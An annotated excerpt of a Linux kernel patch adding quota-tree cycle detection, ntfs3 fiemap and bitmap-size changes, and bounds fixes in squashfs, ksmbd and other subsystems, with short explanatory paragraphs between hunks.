++
++	if (fieinfo->fi_extents_mapped >= fieinfo->fi_extents_max)
++		return 1;
++
++	if (flags & FIEMAP_EXTENT_DELALLOC)
++		flags |= FIEMAP_EXTENT_UNKNOWN;
++	if (flags & FIEMAP_EXTENT_DATA_ENCRYPTED)
++		flags |= FIEMAP_EXTENT_ENCODED;
++	if (flags & (FIEMAP_EXTENT_DATA_TAIL | FIEMAP_EXTENT_DATA_INLINE))
++		flags |= FIEMAP_EXTENT_NOT_ALIGNED;
++
++	memset(&extent, 0, sizeof(extent));
++	extent.fe_logical = logical;
++	extent.fe_physical = phys;
++	extent.fe_length = len;
++	extent.fe_flags = flags;
++
++	dest += fieinfo->fi_extents_mapped;
++	memcpy(dest, &extent, sizeof(extent));
++
++	fieinfo->fi_extents_mapped++;
++	if (fieinfo->fi_extents_mapped == fieinfo->fi_extents_max)
++		return 1;
++	return (flags & FIEMAP_EXTENT_LAST) ? 1 : 0;
++}
++
+ /*
+  * ni_fiemap - Helper for file_fiemap().
+  *
+@@ -1907,6 +1948,8 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 	      __u64 vbo, __u64 len)
+ {
+ 	int err = 0;
++	struct fiemap_extent __user *fe_u = fieinfo->fi_extents_start;
++	struct fiemap_extent *fe_k = NULL;
+ 	struct ntfs_sb_info *sbi = ni->mi.sbi;
+ 	u8 cluster_bits = sbi->cluster_bits;
+ 	struct runs_tree *run;
+@@ -1954,6 +1997,18 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 		goto out;
+ 	}
+ 
++	/*
++	 * To avoid locking problems, replace the pointer to user memory with a pointer to kernel memory.
++	 */
++	fe_k = kmalloc_array(fieinfo->fi_extents_max,
++			     sizeof(struct fiemap_extent),
++			     GFP_NOFS | __GFP_ZERO);
++	if (!fe_k) {
++		err = -ENOMEM;
++		goto out;
++	}
++	fieinfo->fi_extents_start = fe_k;
++
+ 	end = vbo + len;
+ 	alloc_size = le64_to_cpu(attr->nres.alloc_size);
+ 	if (end > alloc_size)
+@@ -2042,8 +2097,9 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 			if (vbo + dlen >= end)
+ 				flags |= FIEMAP_EXTENT_LAST;
+ 
+-			err = fiemap_fill_next_extent(fieinfo, vbo, lbo, dlen,
+-						      flags);
++			err = fiemap_fill_next_extent_k(fieinfo, vbo, lbo, dlen,
++							flags);
++
+ 			if (err < 0)
+ 				break;
+ 			if (err == 1) {
+@@ -2063,7 +2119,8 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 		if (vbo + bytes >= end)
+ 			flags |= FIEMAP_EXTENT_LAST;
+ 
+-		err = fiemap_fill_next_extent(fieinfo, vbo, lbo, bytes, flags);
++		err = fiemap_fill_next_extent_k(fieinfo, vbo, lbo, bytes,
++						flags);
+ 		if (err < 0)
+ 			break;
+ 		if (err == 1) {
+@@ -2076,7 +2133,19 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 
+ 	up_read(run_lock);
+ 
++	/*
++	 * Copy to user memory outside the lock.
++	 */
++	if (copy_to_user(fe_u, fe_k,
++			 fieinfo->fi_extents_max *
++				 sizeof(struct fiemap_extent))) {
++		err = -EFAULT;
++	}
++
+ out:
++	/* Restore original pointer. */
++	fieinfo->fi_extents_start = fe_u;
++	kfree(fe_k);
+ 	return err;
+ }
+ 
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 97723a839c81a..a7e2009419c37 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -493,7 +493,7 @@ static int ntfs_extend_mft(struct ntfs_sb_info *sbi)
+ 	ni->mi.dirty = true;
+ 
+ 	/* Step 2: Resize $MFT::BITMAP. */
+-	new_bitmap_bytes = bitmap_size(new_mft_total);
++	new_bitmap_bytes = ntfs3_bitmap_size(new_mft_total);
+ 
+ 	err = attr_set_size(ni, ATTR_BITMAP, NULL, 0, &sbi->mft.bitmap.run,
+ 			    new_bitmap_bytes, &new_bitmap_bytes, true, NULL);
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 9c36e0f3468d7..2589f6d1215fe 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1454,8 +1454,8 @@ static int indx_create_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 
+ 	alloc->nres.valid_size = alloc->nres.data_size = cpu_to_le64(data_size);
+ 
+-	err = ni_insert_resident(ni, bitmap_size(1), ATTR_BITMAP, in->name,
+-				 in->name_len, &bitmap, NULL, NULL);
++	err = ni_insert_resident(ni, ntfs3_bitmap_size(1), ATTR_BITMAP,
++				 in->name, in->name_len, &bitmap, NULL, NULL);
+ 	if (err)
+ 		goto out2;
+ 
+@@ -1516,8 +1516,9 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (bmp) {
+ 		/* Increase bitmap. */
+ 		err = attr_set_size(ni, ATTR_BITMAP, in->name, in->name_len,
+-				    &indx->bitmap_run, bitmap_size(bit + 1),
+-				    NULL, true, NULL);
++				    &indx->bitmap_run,
++				    ntfs3_bitmap_size(bit + 1), NULL, true,
++				    NULL);
+ 		if (err)
+ 			goto out1;
+ 	}
+@@ -2080,7 +2081,7 @@ static int indx_shrink(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (err)
+ 		return err;
+ 
+-	bpb = bitmap_size(bit);
++	bpb = ntfs3_bitmap_size(bit);
+ 	if (bpb * 8 == nbits)
+ 		return 0;
+ 
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 3e65ccccdb899..a88f6879fcaaa 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -951,9 +951,9 @@ static inline bool run_is_empty(struct runs_tree *run)
+ }
+ 
+ /* NTFS uses quad aligned bitmaps. */
+-static inline size_t bitmap_size(size_t bits)
++static inline size_t ntfs3_bitmap_size(size_t bits)
+ {
+-	return ALIGN((bits + 7) >> 3, 8);
++	return BITS_TO_U64(bits) * sizeof(u64);
+ }
+ 
+ #define _100ns2seconds 10000000
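
Renaming bitmap_size() to ntfs3_bitmap_size() avoids a collision with the generic helper this same patch adds to include/linux/bitmap.h (see below), and the new body computes the identical quad-aligned byte count. Checking the equivalence with two sample values (helper names below are for illustration only):

	/* Old and new formulas agree: bytes needed, rounded to whole u64s. */
	static inline size_t bmsize_old(size_t bits)
	{
		return ALIGN((bits + 7) >> 3, 8);
	}

	static inline size_t bmsize_new(size_t bits)
	{
		return BITS_TO_U64(bits) * sizeof(u64);
	}

	/* bits = 65: old = ALIGN(9, 8) = 16;  new = 2 * 8 = 16 */
	/* bits = 64: old = ALIGN(8, 8) = 8;   new = 1 * 8 = 8  */
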
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index ab0711185b3d5..667ff92f5afc5 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1108,7 +1108,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	/* Check bitmap boundary. */
+ 	tt = sbi->used.bitmap.nbits;
+-	if (inode->i_size < bitmap_size(tt)) {
++	if (inode->i_size < ntfs3_bitmap_size(tt)) {
+ 		err = -EINVAL;
+ 		goto put_inode_out;
+ 	}
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index b67557647d61f..f7ab6b44011b5 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -995,9 +995,8 @@ struct dquot *dqget(struct super_block *sb, struct kqid qid)
+ 	 * smp_mb__before_atomic() in dquot_acquire().
+ 	 */
+ 	smp_rmb();
+-#ifdef CONFIG_QUOTA_DEBUG
+-	BUG_ON(!dquot->dq_sb);	/* Has somebody invalidated entry under us? */
+-#endif
++	/* Has somebody invalidated entry under us? */
++	WARN_ON_ONCE(hlist_unhashed(&dquot->dq_hash));
+ out:
+ 	if (empty)
+ 		do_destroy_dquot(empty);
+diff --git a/fs/quota/quota_tree.c b/fs/quota/quota_tree.c
+index 0f1493e0f6d05..254f6359b287f 100644
+--- a/fs/quota/quota_tree.c
++++ b/fs/quota/quota_tree.c
+@@ -21,6 +21,12 @@ MODULE_AUTHOR("Jan Kara");
+ MODULE_DESCRIPTION("Quota trie support");
+ MODULE_LICENSE("GPL");
+ 
++/*
++ * Maximum quota tree depth we support. Only to limit recursion when working
++ * with the tree.
++ */
++#define MAX_QTREE_DEPTH 6
++
+ #define __QUOTA_QT_PARANOIA
+ 
+ static int __get_index(struct qtree_mem_dqinfo *info, qid_t id, int depth)
+@@ -327,27 +333,36 @@ static uint find_free_dqentry(struct qtree_mem_dqinfo *info,
+ 
+ /* Insert reference to structure into the trie */
+ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+-			  uint *treeblk, int depth)
++			  uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	int ret = 0, newson = 0, newact = 0;
+ 	__le32 *ref;
+ 	uint newblk;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	if (!*treeblk) {
++	if (!blks[depth]) {
+ 		ret = get_free_dqblk(info);
+ 		if (ret < 0)
+ 			goto out_buf;
+-		*treeblk = ret;
++		for (i = 0; i < depth; i++)
++			if (ret == blks[i]) {
++				quota_error(dquot->dq_sb,
++					"Free block already used in tree: block %u",
++					ret);
++				ret = -EIO;
++				goto out_buf;
++			}
++		blks[depth] = ret;
+ 		memset(buf, 0, info->dqi_usable_bs);
+ 		newact = 1;
+ 	} else {
+-		ret = read_blk(info, *treeblk, buf);
++		ret = read_blk(info, blks[depth], buf);
+ 		if (ret < 0) {
+ 			quota_error(dquot->dq_sb, "Can't read tree quota "
+-				    "block %u", *treeblk);
++				    "block %u", blks[depth]);
+ 			goto out_buf;
+ 		}
+ 	}
+@@ -357,8 +372,20 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 			     info->dqi_blocks - 1);
+ 	if (ret)
+ 		goto out_buf;
+-	if (!newblk)
++	if (!newblk) {
+ 		newson = 1;
++	} else {
++		for (i = 0; i <= depth; i++)
++			if (newblk == blks[i]) {
++				quota_error(dquot->dq_sb,
++					"Cycle in quota tree detected: block %u index %u",
++					blks[depth],
++					get_index(info, dquot->dq_id, depth));
++				ret = -EIO;
++				goto out_buf;
++			}
++	}
++	blks[depth + 1] = newblk;
+ 	if (depth == info->dqi_qtree_depth - 1) {
+ #ifdef __QUOTA_QT_PARANOIA
+ 		if (newblk) {
+@@ -370,16 +397,16 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 			goto out_buf;
+ 		}
+ #endif
+-		newblk = find_free_dqentry(info, dquot, &ret);
++		blks[depth + 1] = find_free_dqentry(info, dquot, &ret);
+ 	} else {
+-		ret = do_insert_tree(info, dquot, &newblk, depth+1);
++		ret = do_insert_tree(info, dquot, blks, depth + 1);
+ 	}
+ 	if (newson && ret >= 0) {
+ 		ref[get_index(info, dquot->dq_id, depth)] =
+-							cpu_to_le32(newblk);
+-		ret = write_blk(info, *treeblk, buf);
++						cpu_to_le32(blks[depth + 1]);
++		ret = write_blk(info, blks[depth], buf);
+ 	} else if (newact && ret < 0) {
+-		put_free_dqblk(info, buf, *treeblk);
++		put_free_dqblk(info, buf, blks[depth]);
+ 	}
+ out_buf:
+ 	kfree(buf);
+@@ -390,7 +417,7 @@ static int do_insert_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ static inline int dq_insert_tree(struct qtree_mem_dqinfo *info,
+ 				 struct dquot *dquot)
+ {
+-	int tmp = QT_TREEOFF;
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
+ 
+ #ifdef __QUOTA_QT_PARANOIA
+ 	if (info->dqi_blocks <= QT_TREEOFF) {
+@@ -398,7 +425,11 @@ static inline int dq_insert_tree(struct qtree_mem_dqinfo *info,
+ 		return -EIO;
+ 	}
+ #endif
+-	return do_insert_tree(info, dquot, &tmp, 0);
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return do_insert_tree(info, dquot, blks, 0);
+ }
+ 
+ /*
+@@ -511,19 +542,20 @@ static int free_dqentry(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 
+ /* Remove reference to dquot from tree */
+ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+-		       uint *blk, int depth)
++		       uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	int ret = 0;
+ 	uint newblk;
+ 	__le32 *ref = (__le32 *)buf;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	ret = read_blk(info, *blk, buf);
++	ret = read_blk(info, blks[depth], buf);
+ 	if (ret < 0) {
+ 		quota_error(dquot->dq_sb, "Can't read quota data block %u",
+-			    *blk);
++			    blks[depth]);
+ 		goto out_buf;
+ 	}
+ 	newblk = le32_to_cpu(ref[get_index(info, dquot->dq_id, depth)]);
+@@ -532,29 +564,38 @@ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ 	if (ret)
+ 		goto out_buf;
+ 
++	for (i = 0; i <= depth; i++)
++		if (newblk == blks[i]) {
++			quota_error(dquot->dq_sb,
++				"Cycle in quota tree detected: block %u index %u",
++				blks[depth],
++				get_index(info, dquot->dq_id, depth));
++			ret = -EIO;
++			goto out_buf;
++		}
+ 	if (depth == info->dqi_qtree_depth - 1) {
+ 		ret = free_dqentry(info, dquot, newblk);
+-		newblk = 0;
++		blks[depth + 1] = 0;
+ 	} else {
+-		ret = remove_tree(info, dquot, &newblk, depth+1);
++		blks[depth + 1] = newblk;
++		ret = remove_tree(info, dquot, blks, depth + 1);
+ 	}
+-	if (ret >= 0 && !newblk) {
+-		int i;
++	if (ret >= 0 && !blks[depth + 1]) {
+ 		ref[get_index(info, dquot->dq_id, depth)] = cpu_to_le32(0);
+ 		/* Block got empty? */
+ 		for (i = 0; i < (info->dqi_usable_bs >> 2) && !ref[i]; i++)
+ 			;
+ 		/* Don't put the root block into the free block list */
+ 		if (i == (info->dqi_usable_bs >> 2)
+-		    && *blk != QT_TREEOFF) {
+-			put_free_dqblk(info, buf, *blk);
+-			*blk = 0;
++		    && blks[depth] != QT_TREEOFF) {
++			put_free_dqblk(info, buf, blks[depth]);
++			blks[depth] = 0;
+ 		} else {
+-			ret = write_blk(info, *blk, buf);
++			ret = write_blk(info, blks[depth], buf);
+ 			if (ret < 0)
+ 				quota_error(dquot->dq_sb,
+ 					    "Can't write quota tree block %u",
+-					    *blk);
++					    blks[depth]);
+ 		}
+ 	}
+ out_buf:
+@@ -565,11 +606,15 @@ static int remove_tree(struct qtree_mem_dqinfo *info, struct dquot *dquot,
+ /* Delete dquot from tree */
+ int qtree_delete_dquot(struct qtree_mem_dqinfo *info, struct dquot *dquot)
+ {
+-	uint tmp = QT_TREEOFF;
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
+ 
+ 	if (!dquot->dq_off)	/* Even not allocated? */
+ 		return 0;
+-	return remove_tree(info, dquot, &tmp, 0);
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return remove_tree(info, dquot, blks, 0);
+ }
+ EXPORT_SYMBOL(qtree_delete_dquot);
+ 
+@@ -613,18 +658,20 @@ static loff_t find_block_dqentry(struct qtree_mem_dqinfo *info,
+ 
+ /* Find entry for given id in the tree */
+ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+-				struct dquot *dquot, uint blk, int depth)
++				struct dquot *dquot, uint *blks, int depth)
+ {
+ 	char *buf = kmalloc(info->dqi_usable_bs, GFP_NOFS);
+ 	loff_t ret = 0;
+ 	__le32 *ref = (__le32 *)buf;
++	uint blk;
++	int i;
+ 
+ 	if (!buf)
+ 		return -ENOMEM;
+-	ret = read_blk(info, blk, buf);
++	ret = read_blk(info, blks[depth], buf);
+ 	if (ret < 0) {
+ 		quota_error(dquot->dq_sb, "Can't read quota tree block %u",
+-			    blk);
++			    blks[depth]);
+ 		goto out_buf;
+ 	}
+ 	ret = 0;
+@@ -636,8 +683,19 @@ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+ 	if (ret)
+ 		goto out_buf;
+ 
++	/* Check for cycles in the tree */
++	for (i = 0; i <= depth; i++)
++		if (blk == blks[i]) {
++			quota_error(dquot->dq_sb,
++				"Cycle in quota tree detected: block %u index %u",
++				blks[depth],
++				get_index(info, dquot->dq_id, depth));
++			ret = -EIO;
++			goto out_buf;
++		}
++	blks[depth + 1] = blk;
+ 	if (depth < info->dqi_qtree_depth - 1)
+-		ret = find_tree_dqentry(info, dquot, blk, depth+1);
++		ret = find_tree_dqentry(info, dquot, blks, depth + 1);
+ 	else
+ 		ret = find_block_dqentry(info, dquot, blk);
+ out_buf:
+@@ -649,7 +707,13 @@ static loff_t find_tree_dqentry(struct qtree_mem_dqinfo *info,
+ static inline loff_t find_dqentry(struct qtree_mem_dqinfo *info,
+ 				  struct dquot *dquot)
+ {
+-	return find_tree_dqentry(info, dquot, QT_TREEOFF, 0);
++	uint blks[MAX_QTREE_DEPTH] = { QT_TREEOFF };
++
++	if (info->dqi_qtree_depth >= MAX_QTREE_DEPTH) {
++		quota_error(dquot->dq_sb, "Quota tree depth too big!");
++		return -EIO;
++	}
++	return find_tree_dqentry(info, dquot, blks, 0);
+ }
+ 
+ int qtree_read_dquot(struct qtree_mem_dqinfo *info, struct dquot *dquot)
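
All three quota-tree walkers (insert, remove, lookup) now carry the full path of visited block numbers in blks[] instead of a single current block, which enables two defenses against a corrupted quota file: recursion depth is capped by MAX_QTREE_DEPTH, and every child block read from disk is compared against its ancestors, so a looping reference fails with EIO instead of recursing forever. The check, isolated as a helper (a hypothetical refactoring of the inline loops above):

	/* Reject a child block that repeats any block on the path so far. */
	static int qtree_check_ref(struct super_block *sb, const uint *blks,
				   int depth, uint newblk)
	{
		int i;

		for (i = 0; i <= depth; i++)
			if (newblk == blks[i]) {
				quota_error(sb, "Cycle in quota tree detected: block %u",
					    newblk);
				return -EIO;
			}
		return 0;
	}
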
+diff --git a/fs/quota/quota_v2.c b/fs/quota/quota_v2.c
+index b1467f3921c28..6921d40645a7e 100644
+--- a/fs/quota/quota_v2.c
++++ b/fs/quota/quota_v2.c
+@@ -166,14 +166,17 @@ static int v2_read_file_info(struct super_block *sb, int type)
+ 		    i_size_read(sb_dqopt(sb)->files[type]));
+ 		goto out_free;
+ 	}
+-	if (qinfo->dqi_free_blk >= qinfo->dqi_blocks) {
+-		quota_error(sb, "Free block number too big (%u >= %u).",
+-			    qinfo->dqi_free_blk, qinfo->dqi_blocks);
++	if (qinfo->dqi_free_blk && (qinfo->dqi_free_blk <= QT_TREEOFF ||
++	    qinfo->dqi_free_blk >= qinfo->dqi_blocks)) {
++		quota_error(sb, "Free block number %u out of range (%u, %u).",
++			    qinfo->dqi_free_blk, QT_TREEOFF, qinfo->dqi_blocks);
+ 		goto out_free;
+ 	}
+-	if (qinfo->dqi_free_entry >= qinfo->dqi_blocks) {
+-		quota_error(sb, "Block with free entry too big (%u >= %u).",
+-			    qinfo->dqi_free_entry, qinfo->dqi_blocks);
++	if (qinfo->dqi_free_entry && (qinfo->dqi_free_entry <= QT_TREEOFF ||
++	    qinfo->dqi_free_entry >= qinfo->dqi_blocks)) {
++		quota_error(sb, "Block with free entry %u out of range (%u, %u).",
++			    qinfo->dqi_free_entry, QT_TREEOFF,
++			    qinfo->dqi_blocks);
+ 		goto out_free;
+ 	}
+ 	ret = 0;
+diff --git a/fs/reiserfs/stree.c b/fs/reiserfs/stree.c
+index 84c12a1947b22..6ecf772919688 100644
+--- a/fs/reiserfs/stree.c
++++ b/fs/reiserfs/stree.c
+@@ -1409,7 +1409,7 @@ void reiserfs_delete_solid_item(struct reiserfs_transaction_handle *th,
+ 	INITIALIZE_PATH(path);
+ 	int item_len = 0;
+ 	int tb_init = 0;
+-	struct cpu_key cpu_key;
++	struct cpu_key cpu_key = {};
+ 	int retval;
+ 	int quota_cut_bytes = 0;
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 4ba6bf1535da1..7263889a772da 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -4169,7 +4169,8 @@ int smb2_query_dir(struct ksmbd_work *work)
+ 		rsp->OutputBufferLength = cpu_to_le32(0);
+ 		rsp->Buffer[0] = 0;
+ 		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
+-				       sizeof(struct smb2_query_directory_rsp));
++				       offsetof(struct smb2_query_directory_rsp, Buffer)
++				       + 1);
+ 		if (rc)
+ 			goto err_out;
+ 	} else {
+diff --git a/fs/squashfs/block.c b/fs/squashfs/block.c
+index 833aca92301f0..45ea5d62cef42 100644
+--- a/fs/squashfs/block.c
++++ b/fs/squashfs/block.c
+@@ -198,7 +198,7 @@ int squashfs_read_data(struct super_block *sb, u64 index, int length,
+ 		TRACE("Block @ 0x%llx, %scompressed size %d\n", index - 2,
+ 		      compressed ? "" : "un", length);
+ 	}
+-	if (length < 0 || length > output->length ||
++	if (length <= 0 || length > output->length ||
+ 			(index + length) > msblk->bytes_used) {
+ 		res = -EIO;
+ 		goto out;
+diff --git a/fs/squashfs/file.c b/fs/squashfs/file.c
+index 8ba8c4c507707..e8df6430444b0 100644
+--- a/fs/squashfs/file.c
++++ b/fs/squashfs/file.c
+@@ -544,7 +544,8 @@ static void squashfs_readahead(struct readahead_control *ractl)
+ 	struct squashfs_page_actor *actor;
+ 	unsigned int nr_pages = 0;
+ 	struct page **pages;
+-	int i, file_end = i_size_read(inode) >> msblk->block_log;
++	int i;
++	loff_t file_end = i_size_read(inode) >> msblk->block_log;
+ 	unsigned int max_pages = 1UL << shift;
+ 
+ 	readahead_expand(ractl, start, (len | mask) + 1);
+diff --git a/fs/squashfs/file_direct.c b/fs/squashfs/file_direct.c
+index f1ccad519e28c..763a3f7a75f6d 100644
+--- a/fs/squashfs/file_direct.c
++++ b/fs/squashfs/file_direct.c
+@@ -26,10 +26,10 @@ int squashfs_readpage_block(struct page *target_page, u64 block, int bsize,
+ 	struct inode *inode = target_page->mapping->host;
+ 	struct squashfs_sb_info *msblk = inode->i_sb->s_fs_info;
+ 
+-	int file_end = (i_size_read(inode) - 1) >> PAGE_SHIFT;
++	loff_t file_end = (i_size_read(inode) - 1) >> PAGE_SHIFT;
+ 	int mask = (1 << (msblk->block_log - PAGE_SHIFT)) - 1;
+-	int start_index = target_page->index & ~mask;
+-	int end_index = start_index | mask;
++	loff_t start_index = target_page->index & ~mask;
++	loff_t end_index = start_index | mask;
+ 	int i, n, pages, bytes, res = -ENOMEM;
+ 	struct page **page;
+ 	struct squashfs_page_actor *actor;
+diff --git a/fs/udf/namei.c b/fs/udf/namei.c
+index 7c95c549dd64e..ded71044988ab 100644
+--- a/fs/udf/namei.c
++++ b/fs/udf/namei.c
+@@ -1183,7 +1183,6 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	if (dir_fi) {
+ 		dir_fi->icb.extLocation = cpu_to_lelb(UDF_I(new_dir)->i_location);
+-		udf_update_tag((char *)dir_fi, udf_dir_entry_len(dir_fi));
+ 		if (old_iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
+ 			mark_inode_dirty(old_inode);
+ 		else
+diff --git a/include/linux/bitmap.h b/include/linux/bitmap.h
+index 03644237e1efb..3c8d2b87a9edc 100644
+--- a/include/linux/bitmap.h
++++ b/include/linux/bitmap.h
+@@ -237,9 +237,11 @@ extern int bitmap_print_list_to_buf(char *buf, const unsigned long *maskp,
+ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1)))
+ #define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1)))
+ 
++#define bitmap_size(nbits)	(ALIGN(nbits, BITS_PER_LONG) / BITS_PER_BYTE)
++
+ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = 0;
+@@ -249,7 +251,7 @@ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ 
+ static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = ~0UL;
+@@ -260,7 +262,7 @@ static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+ static inline void bitmap_copy(unsigned long *dst, const unsigned long *src,
+ 			unsigned int nbits)
+ {
+-	unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
++	unsigned int len = bitmap_size(nbits);
+ 
+ 	if (small_const_nbits(nbits))
+ 		*dst = *src;
+@@ -279,6 +281,18 @@ static inline void bitmap_copy_clear_tail(unsigned long *dst,
+ 		dst[nbits / BITS_PER_LONG] &= BITMAP_LAST_WORD_MASK(nbits);
+ }
+ 
++static inline void bitmap_copy_and_extend(unsigned long *to,
++					  const unsigned long *from,
++					  unsigned int count, unsigned int size)
++{
++	unsigned int copy = BITS_TO_LONGS(count);
++
++	memcpy(to, from, copy * sizeof(long));
++	if (count % BITS_PER_LONG)
++		to[copy - 1] &= BITMAP_LAST_WORD_MASK(count);
++	memset(to + copy, 0, bitmap_size(size) - copy * sizeof(long));
++}
++
+ /*
+  * On 32-bit systems bitmaps are represented as u32 arrays internally. On LE64
+  * machines the order of hi and lo parts of numbers match the bitmap structure.
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 6a524c5462a6f..33b073deb8c17 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -445,11 +445,6 @@ struct bpf_verifier_log {
+ 	u32 len_total;
+ };
+ 
+-static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
+-{
+-	return log->len_used >= log->len_total - 1;
+-}
+-
+ #define BPF_LOG_LEVEL1	1
+ #define BPF_LOG_LEVEL2	2
+ #define BPF_LOG_STATS	4
+@@ -459,6 +454,11 @@ static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
+ #define BPF_LOG_MIN_ALIGNMENT 8U
+ #define BPF_LOG_ALIGNMENT 40U
+ 
++static inline bool bpf_verifier_log_full(const struct bpf_verifier_log *log)
++{
++	return log->len_used >= log->len_total - 1;
++}
++
+ static inline bool bpf_verifier_log_needed(const struct bpf_verifier_log *log)
+ {
+ 	return log &&
+@@ -466,13 +466,6 @@ static inline bool bpf_verifier_log_needed(const struct bpf_verifier_log *log)
+ 		 log->level == BPF_LOG_KERNEL);
+ }
+ 
+-static inline bool
+-bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log)
+-{
+-	return log->len_total >= 128 && log->len_total <= UINT_MAX >> 2 &&
+-	       log->level && log->ubuf && !(log->level & ~BPF_LOG_MASK);
+-}
+-
+ #define BPF_MAX_SUBPROGS 256
+ 
+ struct bpf_subprog_info {
+@@ -556,12 +549,14 @@ struct bpf_verifier_env {
+ 	char type_str_buf[TYPE_STR_BUF_LEN];
+ };
+ 
++bool bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log);
+ __printf(2, 0) void bpf_verifier_vlog(struct bpf_verifier_log *log,
+ 				      const char *fmt, va_list args);
+ __printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
+ 					   const char *fmt, ...);
+ __printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
+ 			    const char *fmt, ...);
++void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos);
+ 
+ static inline struct bpf_func_state *cur_func(struct bpf_verifier_env *env)
+ {
+@@ -645,8 +640,8 @@ static inline u32 type_flag(u32 type)
+ /* only use after check_attach_btf_id() */
+ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+-	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->dst_prog) ?
+-		prog->aux->dst_prog->type : prog->type;
++	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->saved_dst_prog_type) ?
++		prog->aux->saved_dst_prog_type : prog->type;
+ }
+ 
+ static inline bool bpf_prog_check_recur(const struct bpf_prog *prog)
+diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h
+index c2aa0aa26b457..76e6d42beb71b 100644
+--- a/include/linux/cpumask.h
++++ b/include/linux/cpumask.h
+@@ -769,7 +769,7 @@ static inline int cpulist_parse(const char *buf, struct cpumask *dstp)
+  */
+ static inline unsigned int cpumask_size(void)
+ {
+-	return BITS_TO_LONGS(nr_cpumask_bits) * sizeof(long);
++	return bitmap_size(nr_cpumask_bits);
+ }
+ 
+ /*
+diff --git a/include/linux/dsa/ocelot.h b/include/linux/dsa/ocelot.h
+index dca2969015d80..6fbfbde68a37c 100644
+--- a/include/linux/dsa/ocelot.h
++++ b/include/linux/dsa/ocelot.h
+@@ -5,6 +5,8 @@
+ #ifndef _NET_DSA_TAG_OCELOT_H
